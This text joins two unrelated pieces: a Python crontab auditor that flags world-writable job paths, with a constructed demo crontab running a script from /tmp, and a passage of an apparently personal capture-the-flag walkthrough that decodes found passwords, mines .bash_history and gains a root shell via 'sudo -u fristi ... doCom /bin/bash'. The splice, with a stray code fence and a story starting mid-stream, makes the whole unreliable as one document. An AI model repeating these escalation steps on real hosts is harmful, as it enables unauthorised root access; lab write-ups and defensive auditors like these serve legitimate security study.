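def audit_crontab(text, root="/"):
    """Flag job paths that other users could write, replace or pre-create.
    root lets a test resolve /tmp/... under a scratch directory instead of the live filesystem."""
    findings = []
    for lineno, user, command in cron_jobs(text):
        for path in referenced_paths(command):
            real = os.path.join(root, path.lstrip("/"))
            try:
                parent_st = os.stat(os.path.dirname(real))
            except FileNotFoundError:
                continue
            if os.path.exists(real):
                file_st = os.stat(real)
                if writable_by_others(file_st):
                    findings.append(f"line {lineno}: job for {user} uses {path}, writable by others "
                                    f"(mode {stat.S_IMODE(file_st.st_mode):o})")
                elif writable_by_others(parent_st):
                    sticky = (" (sticky bit set, so only its owner can replace it)"
                              if parent_st.st_mode & stat.S_ISVTX else "")
                    findings.append(f"line {lineno}: job for {user} uses {path} from a directory "
                                    f"writable by others{sticky}")
            elif writable_by_others(parent_st):
                findings.append(f"line {lineno}: job for {user} references {path}, which does not "
                                f"exist yet but any user can create it there")
    return findings


def demo():
    """Constructed scenario: a /tmp-like world-writable directory and a job that runs a file from it."""
    root = tempfile.mkdtemp()
    tmp = os.path.join(root, "tmp")
    os.mkdir(tmp)
    os.chmod(tmp, 0o1777)                               # same mode as the real /tmp
    bin_dir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bin_dir)
    os.chmod(bin_dir, 0o755)
    backup = os.path.join(bin_dir, "backup.sh")
    with open(backup, "w") as fh:
        fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(backup, 0o755)
    crontab = ("PATH=/usr/bin:/bin\n"
               "# constructed sample crontab\n"
               "*/1 * * * * admin sh /tmp/runthis > /tmp/cronresult\n"
               "0 3 * * * root /usr/local/bin/backup.sh\n")
    return audit_crontab(crontab, root=root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Against a real host, `audit_crontab(open("/etc/crontab").read())` covers the system crontab; the same function works on each file under /etc/cron.d, since they share the user-field format.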

I found some suspicious text files which could be hints for the next challenge.

-- whoisyourgodnow.txt
-- cryptedpass.txt
-- cryptpass.py

Two files contained some encrypted text, one of them base64 and the other some random text (as far as I could guess), and the third one was a Python file to decode those passwords. I decided to decode one of them, starting with the base64 one.



So it was a password (I guessed so, because the password for the admin panel was also disclosed in the same manner).

I decided to try it for fristigod and logged in successfully :)


After owning the fristigod user I came one step closer to root :D


So I was in the dir /var/fristigod, as unfortunately I didn't find any hint in /home/fristigod/. There I noticed some hidden files, one of them .bash_history; I decided to open it and found a set of commands recorded in that file, as if whoever had been there before me had used them. I thought to give them a try ( 3:) evil mind)

$ cat .bash_history 

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""


hmm ... 

Okay!! Now I was a bit tired and decided to do "sudo -l" to get the $PATH


"/var/fristigod/.secret_admin_stuff/doCom" was a clear hint that this file has some privilege to change permissions or to do some tasks with root's permissions, because it's owned by root.

I decided to execute this file "doCom"

$  ./.secret_admin_stuff/doCom

and got prompted with the result

"Nice try , But wrong user ;)"

There I decided to use "sudo" with the argument "-u"

$ sudo -u fristi ./.secret_admin_stuff/doCom

Again I got a hint about the usage of this file

"Usage: ./program_name terminal_command ..."

lol, here I got the idea that this file will elevate the privileges of whatever program we choose :P I decided to go with /bin/bash; after all, who the hell doesn't want /bin/bash with full privileges? ( 3:D evil mind)

$ sudo -u fristi ./.secret_admin_stuff/doCom /bin/bash

Voila!!






Thanks Aaditya Purani :D for being an inspiration bro :D post dedicated to you bro ^_^

=> Walkthrough to Billy Madison 1.1 By Aaditya Purani

---------

Okay!! So here I end this post :) hope you like it :)